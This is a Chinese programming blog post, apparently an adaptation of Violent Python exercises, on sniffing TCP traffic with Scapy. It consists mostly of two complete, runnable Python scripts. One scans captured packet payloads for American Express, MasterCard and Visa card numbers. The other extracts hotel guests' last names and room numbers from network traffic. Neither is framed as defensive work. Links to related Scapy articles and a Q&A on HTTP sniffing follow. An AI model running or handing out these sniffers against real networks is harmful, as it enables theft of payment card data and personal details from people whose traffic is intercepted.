Scapy嗅探TCP数据包

最新推荐文章于 2024-08-07 08:10:55 发布
最新推荐文章于 2024-08-07 08:10:55 发布
阅读量2.5k 收藏 2
点赞数 
#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *

def findCreditCard(pkt):
	raw = pkt.sprintf('%Raw.load%')
	# American Express信用卡由34或37开头的15位数字组成
	americaRE = re.findall('3[47][0-9]{13}', raw)
	# MasterCard信用卡的开头为51~55,共16位数字
	masterRE = re.findall('5[1-5][0-9]{14}', raw)
	# Visa信用卡开头数字为4,长度为13或16位
	visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)

	if americaRE:
		print '[+] Found American Express Card: ' + americaRE[0]
	if masterRE:
		print '[+] Found MasterCard Card: ' + masterRE[0]
	if visaRE:
		print '[+] Found Visa Card: ' + visaRE[0]

def main():
	parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i <interface>')
	parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
	(options, args) = parser.parse_args()

	if options.interface == None:
		print parser.usage
		exit(0)
	else:
		conf.iface = options.interface

	try:
		print '[*] Starting Credit Card Sniffer.'
		sniff(filter='tcp', prn=findCreditCard, store=0)
	except KeyboardInterrupt:
		exit(0)

if __name__ == '__main__':
	main()





#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGuest(pkt):
    #sprintf("%Raw.load%")函数实现提取tcp数据段,并将其转化为字符串
    '''
     tcp数据段,并将其转化为字符串,但是转化后的结果类似于raw_string,字符串中的‘\x’失效了,被当做了2个字符。请问该怎么转化,使得转义字符‘\x’生效,使得类似‘\x11’、'\x04'等等的字符被看做一个字符而不是4个?
     解答:用个函数实现rawstring转string,即可。
     raw = raw.replace('\'','')
     string = raw.decode('string_escape')
    '''
    raw = pkt.sprintf('%Raw.load%')
    #语法:findall(pattern, string, flags=0) 正则表达式 re findall 方法能够以列表的形式返回能匹配的子串
    # . 匹配任意一个字符,换行符除外
    # * 匹配前一个正则表达式的0次或多次重复
    # ? 匹配前一个正则表达式的0次或1次重复
    name = re.findall('(?i)LAST_NAME=(.*)&', raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Hotel Guest Sniffer.'
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()



zwlww1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
局域网嗅探数据包发送
06-03
更复杂的工具如hping3或scapy允许创建和发送各种类型的网络数据包,包括TCP、UDP、ICMP等,以进行更细致的网络分析。 **数据包发送的应用场景** 1. **网络诊断**:通过模拟不同类型的网络通信,可以找出网络中的...
python应用系列教程——python使用scapy监听网络数据包、按TCP/IP协议进行解析
全栈工程师开发手册(原创)https://github.com/tencentmusic/cube-studio
10-28 2万+
全栈工程师开发手册 (作者:栾鹏) python教程全解 python使用scapy监听抓取网络数据包scapy具有模拟发送数据包、监听解析数据包、互联网协议解析、数据挖掘等多种用处。这里我们只来说一下scapy监听数据包,并按照不同的协议进行解析。 首先需要安装scapy包,点击下载 python库的安装方法请参考Python库的安装与卸载 scapy也是基于libc
python|使用Scapy分析流量包
S4n_v1的博客
05-11 3308
抓包分析其中 ICMP 包的数量与比例。
使用 Scapy 库编写 TCP 窗口大小探测攻击脚本
Flag少侠的博客
06-11 9257
TCP窗口大小探测攻击是一种信息收集攻击,攻击者通过向目标服务器发送特制的TCP数据包,探测目标服务器的TCP接收窗口大小(TCP Window Size)。了解目标服务器的TCP接收窗口大小,可以帮助攻击者优化后续的DDoS攻击,提高攻击效率和破坏性。
python之用scapy分层解析pcap报文(Ethernet帧、IP数据包TCP数据包、UDP数据包、Raw数据包
GFS_lele的博客
03-27 2万+
一、工具准备   下载安装scapy库(https://blog.csdn.net/qq_23977687/article/details/88046257) 二、scapy用法   1.1、得到数据   有两种方式,实时抓包,读取 pcap文件   实时抓包:利用sniff方法来实现(eth0是要检测的网卡名,count是抓包的数量) from scapy.all import...
scapy获取ip_Wireshark网络分析(七)scapy模拟TCP数据发送及重传
weixin_32817047的博客
01-04 1771
引言本文通过scapy【1】和wireshark对于TCP连接建立、发送数据以及socket关闭过程进行分析。并通过scapy编写程序模拟TCP协议分组丢失、重传的场景。可以学习scapy的使用和并熟悉TCP传输-确认机制。scapy介绍scapy可以发送、监听、剖析及伪造网络数据包,是功能非常强大的数据包操控程序。主要完成两方面的事情:发送数据包、接收应答。读者可以通过scapy文档中...
scapy如何自动切分每一个tcp会话
weixin_35748962的博客
02-02 194
Scapy可以通过对TCP数据包进行解析,判断源端口和目的端口,来自动切分每一个TCP会话。在Scapy中,可以使用sniff()函数来监听网络流量,并使用prn参数传递自定义的回调函数,以对TCP数据包进行处理。 例如: def handle_tcp_packet(pkt): if pkt.haslayer(TCP): src_port = pkt[TCP].sport ...
Python-scapy基于python的交互式数据包处理程序和库
08-10
1. **数据包构造**:Scapy允许用户自定义数据包结构,包括TCP、UDP、IP、ARP等常见协议,甚至可以构建更复杂的协议栈,如TLS、HTTP等。通过定义Layer类,你可以构建任意复杂的数据包结构。 2. **数据包发送与接收**...
python数据包嗅探
02-16
在Python中,最常用的库用于数据包嗅探ScapyScapy是一个强大的网络协议构造和分析库,它可以创建、修改和发送几乎任何网络协议的数据包。使用Scapy,我们可以轻松地编写数据包嗅探器。 以下是一个简单的Python...
python库 scapy.zip
03-30
3. **数据包嗅探与处理**:Scapy集成了数据包嗅探的功能,可以监听网络流量,并根据预设条件过滤或处理数据包。 4. **交互式环境**:Scapy提供了一个交互式的Python shell,用户可以直接在其中编写和执行网络操作,...
python_scapy
03-17
"python_scapy"这个项目显然与使用Python 3版本的Scapy库相关,主要涉及到网络嗅探数据包构建和分析等方面的知识。 首先,让我们深入了解Scapy库。Scapy是一个开源项目,由Laurent Bercot开发,它提供了一个高级...
Python Scapy 报文构造和解析
测试开发小记
02-19 9637
目录下载安装Scapy 的使用DHCPv6报文构造发送报文1. 只发不收2. 发且收报文过滤 Scapy是一款强大的交互式数据包处理工具、数据包生成器、网络扫描器、网络发现工具和包嗅探工具。能灵活地构造各种数据包、发送数据包、包嗅探、应答和反馈匹配等功能。 下载安装 官网:https://scapy.net/ github地址:https://github.com/secdev/scapy 官方文档:https://scapy.readthedocs.io/en/latest/ pip install sc
[Scapy]导入导出数据
friend_c的博客
05-24 356
PCAP # 导出数据 wrpcap("temp.cap",pkts) #导入数据 pkts = rdpcap("temp.cap") or pkts = sniff(offline="temp.cap") Hexdump 十六进制 >>> hexdump(pkt) 0000 00 50 56 FC CE 50 00 0C 29 2B 53 19 08 00 45 00 .PV..P..)+S...E. 0010 00 54 00 00 40 00 40 01 5.
Scapy基础学习之一
热门推荐
wang_walfred的专栏
10-13 5万+
关于Scapy Scapy的是一个强大的交互式数据包处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。它可以很容易地处理一些典型操作,比如端口扫描,tracerouting,探测,单元测试,攻击或网络发现(可替代hping,NMAP,arpspoof,ARP-SK,arping,tcpdump,tethereal,P0F等)。最重要的
scapy读取流量包
学-> 思->用
11-19 902
Scapy 是一个 Python 程序,它使用户能够发送、嗅探、剖析和伪造网络数据包。此功能允许构建可以探测、扫描或攻击网络的工具.其次能够伪造或解码大量协议的数据包.Scapy 可以轻松处理大多数经典任务,例如扫描、跟踪、探测、单元测试、攻击或网络发现。可以进行跟踪路由并因此仅给出请求的开始 TTL 和答案的源 IP 的方法。可以 ping 整个网络并给出应答的机器列表。可以执行端口扫描并返回 LaTeX 报告。
scapy的使用
Au_Wind的博客
04-07 434
web安全编程 之 scapy的使用
Python知识点:使用Scapy进行网络数据包分析
最新发布
码农超哥的博客
08-07 705
使用Scapy进行网络数据包分析涉及几个步骤:安装Scapy库、捕获数据包、分析数据包以及执行一些常见的网络分析任务。以下是一个详细的示例流程。
TCP、UDP、ICMP协议抓包详解
liufangping的博客
11-29 3077
这里使用tcpdump对TCP、UDP、ICMP协议进行抓包,并详细解析其内容 1.实验源码 TCP和UDP抓包时使用以下tcp_echoserver.c、tcp_echoclient.c、udp_echoserver.c和udp_echoclient.c进行实验 tcp_echoserver.c #include <arpa/inet.h> #include <signal.h...
Python使用scapy和dpkt抓包并解析
培根芝士的专栏
10-24 7726
scapy是python中一个可用于网络嗅探的非常强大的第三方库,可以用它来做 packet 嗅探和伪造 packet。dpkt读取每个pcap包里的内容,用isinstance判断是不是有IP的包,再判断是属于哪个协议,对应的协议已经封装好API如果发现可以匹配某个协议API就输出来相关值。dpkt是一个python模块,可以对简单的数据包创建/解析,以及基本TCP / IP协议的解析,速度很快。ls(IP) 命令列出ip协议头部字段格式,只要想查看哪个协议的参数,括号里就填哪个协议。
如何使用scapy嗅探到http流量
09-21
### 回答1: 使用Scapy嗅探HTTP流量的方法如下: 1. 安装Scapy:在终端或命令行中输入 "pip install scapy" 即可安装。 2. 启动Scapy:在终端或命令行中输入 "scapy" 并回车,进入Scapy交互界面。 3. 定义过滤规则:使用Scapy的 sniff() 函数来嗅探网络流量,并通过filter参数指定嗅探的过滤规则,如 "sniff(filter="tcp port 80")" 表示只嗅探端口为80的TCP流量。 4. 解析HTTP流量:在Sniff函数中,可以通过 prn 参数指定回调函数,在回调函数中判断每个报文是否为HTTP流量,并对其进行解析。 以上是大致的嗅探HTTP流量的步骤,如需详细示例代码,可以参考Scapy官方文档。 ### 回答2: 使用Scapy进行HTTP流量嗅探可以通过以下步骤完成: 1. 导入必要的库和模块:导入Scapy库以及HTTP模块。 2. 创建嗅探器:使用Scapy的sniff()函数创建一个嗅探器,设置嗅探器过滤条件为HTTP流量。 3. 捕获HTTP请求和响应:在嗅探器的回调函数中,使用匹配条件过滤出HTTP请求和响应数据包。 4. 解析HTTP数据包:从每个HTTP请求和响应数据包中提取所需的信息,如请求方法、URL、头部字段、实体内容等。 5. 分析和处理数据:根据需要进行数据的分析和处理,可以将解析的数据保存到文件、数据库或进行进一步的操作。 以下是一个示例代码: ```python from scapy.all import * from scapy.layers.http import HTTPRequest, HTTPResponse def packet_callback(packet): if packet.haslayer(HTTPRequest): http_request = packet[HTTPRequest] print(f"HTTPRequest: {http_request.Method.decode()} {http_request.Path.decode()}") if packet.haslayer(HTTPResponse): http_response = packet[HTTPResponse] print(f"HTTPResponse: {http_response.Status_Code.decode()} {http_response.Reason_Phrase.decode()}") sniff(filter="tcp port 80", prn=packet_callback, store=0) ``` 上述代码使用了Scapy的sniff()函数创建了一个嗅探器,设置过滤条件为端口为80的TCP流量。在回调函数中,使用haslayer()函数检测数据包中是否包含HTTP请求或响应,并通过调用相应的字段解析函数提取所需信息。 运行该代码后,你将能够捕获并输出所有通过端口80的HTTP请求和响应的相关信息。你也可以根据自己的需要对数据进行进一步处理。 ### 回答3: 使用Scapy嗅探HTTP流量有以下几个步骤: 1. 导入必要的模块和类: 首先,需要导入必要的模块和类来使用Scapy库。例如,可以导入`scapy.all`模块并创建一个Sniffer对象。 2. 设置过滤器: 设置过滤器可以筛选出需要嗅探的HTTP流量。可以使用BPF过滤器语法来定义需要过滤的流量。例如,`"tcp port 80"`表示过滤HTTP流量。 3. 开始嗅探: 创建Sniffer对象,并设置参数,如网络接口和过滤器。然后,执行sniff()方法开始嗅探流量。 4. 解析流量: Scapy通过回调函数来处理嗅探到的流量数据包。可以自定义回调函数来解析HTTP流量,并对其进行相应的操作。通常,解析HTTP流量的时候,需要判断数据包中的协议类型与端口号是否为HTTP。如果是HTTP流量,可以使用`TCP`和`Raw`类来获取HTTP请求和响应的详细信息。 5. 分析和处理流量: 当解析出HTTP请求和响应的详细信息后,可以对其进行进一步的分析和处理。可以提取出相关字段,如请求的URL、请求方法、响应码等,以及相应的报文体。根据需要,可以将这些信息输出到控制台、保存到文件或进行其他操作。 需要注意的是,Scapy嗅探流量时需要有足够的权限。在Linux中,可以使用root权限执行脚本;在Windows中,可以使用管理员权限运行脚本。 以上是使用Scapy嗅探HTTP流量的基本步骤,根据具体需求还可以进行更多的操作和处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值